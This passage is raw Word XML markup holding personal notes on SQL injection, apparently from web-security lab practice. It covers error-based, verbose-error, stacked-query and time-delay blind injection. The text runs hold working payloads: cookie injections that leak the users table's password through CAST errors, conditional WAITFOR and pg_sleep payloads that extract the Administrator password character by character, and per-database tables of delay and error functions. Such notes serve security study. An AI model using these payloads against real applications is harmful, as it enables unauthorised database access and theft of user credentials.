          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkYellow"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:cs="Liberation Serif" w:eastAsia="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Error-based SQL injection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1fob9te" w:id="4"/>
      <w:bookmarkEnd w:id="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AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a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ab/>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AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a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spacing w:after="150" w:before="280" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="red"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This generally work but depends on type of database like oracle, postgress or mysql so chose the payload from cheatsheet for bind error sql injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>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Limit does not work here in the sql injection of the above command where error checking is happening like the following </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.3znysh7" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM users  WHERE username='administrator')||'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUBSTR(string, index,length) for Oracle</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="7110.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5565"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1545"/>
            <w:gridCol w:w="5565"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>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SUBSTR('foobar', 4, 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SUBSTRING('foobar', 4, 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PostgreSQL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6"/>
            <w:bookmarkEnd w:id="6"/>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SUBSTRING('foobar', 4, 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SUBSTRING('foobar', 4, 2)</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bookmarkStart w:colFirst="0" w:colLast="0" w:name="bookmark=id.tyjcwt" w:id="7"/>
    <w:bookmarkEnd w:id="7"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkYellow"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkYellow"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extracting sensitive data via verbose SQL error messages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000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also adding a single quote also gives error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command will always give error and check for verbose messages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ab/>
        <w:t xml:space="preserve">CAST((SELECT example_column FROM example_table) AS int)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Sometimes there is a character limit so removing trackingid or some other fields can be great. Ex:</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t xml:space="preserve">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Cookie: TrackingId='AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="360" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.c645ojp2xngu" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Batched (or stacked) queries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use batched queries to execute multiple queries in succession. Note that while the subsequent queries are executed, the results are not returned to the application. Hence this technique is primarily of use in relation to blind vulnerabilities where you can use a second query to trigger a DNS lookup, conditional error, or time delay.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rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="bookmark=id.3dy6vkm" w:id="9"/>
    <w:bookmarkEnd w:id="9"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="280" w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkYellow"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkYellow"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiting blind SQL injection by triggering time delays</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:spacing w:after="15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6">
      <w:pPr>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Submitting OAST payloads designed to trigger an out-of-band network interaction when executed within a SQL query, and monitoring for any resulting interactions.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ab/>
        <w:t xml:space="preserve">For time delays</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="7200.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5655"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1545"/>
            <w:gridCol w:w="5655"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>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dbms_pipe.receive_message(('a'),10))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WAITFOR DELAY '0:0:10'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PostgreSQL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pg_sleep(10)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SLEEP(10)</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ourier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">also try with directly sleep like ` pg_sleep(10) ` or ` sleep(10) `</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="bookmark=id.1t3h5sf" w:id="10"/>
    <w:bookmarkEnd w:id="10"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="280" w:before="280" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Conditional time delays</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Submitting payloads designed to trigger time delays when executed within a SQL query, and looking for differences in the time taken to respond.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:spacing w:after="15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spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.gjdgxs" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">`'; IF (1=2) WAITFOR DELAY '0:0:10'--`</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">e.g. '; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) &gt; 'm') = 1 WAITFOR DELAY '0:0:{delay}'--</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96" w:before="96" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="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You can test a single boolean condition and trigger a time delay if the condition is true.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="9025.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1547"/>
        <w:gridCol w:w="7478"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1547"/>
            <w:gridCol w:w="7478"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>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CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual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IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'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PostgreSQL</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CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END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IF(YOUR-CONDITION-HERE,SLEEP(10),'a')</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:spacing w:after="150" w:before="280" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always use + at the end of comment as shown below and also check that select is not being used everywhere as in where clause it can be directly used</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Mono" w:cs="Liberation Mono" w:eastAsia="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie: TrackingId=LNPMeEF8by4VWnNk'|| pg_sleep(10)--+</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(SELECT CASE WHEN 1=1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            THEN pg_sleep(10)</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            ELSE pg_sleep(0) END</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86">
      <w:pPr>
        <w:spacing w:after="150" w:before="280" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the site </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Liberation Mono" w:cs="Liberation Mono" w:eastAsia="Liberation Mono" w:hAnsi="Liberation Mono"/>
            <w:b w:val="0"/>
            <w:i w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:color w:val="000000"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://meyerweb.com/eric/tools/dencoder/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to encode/decode the ; present in cookies or</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> CTRL+U to encode or decode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
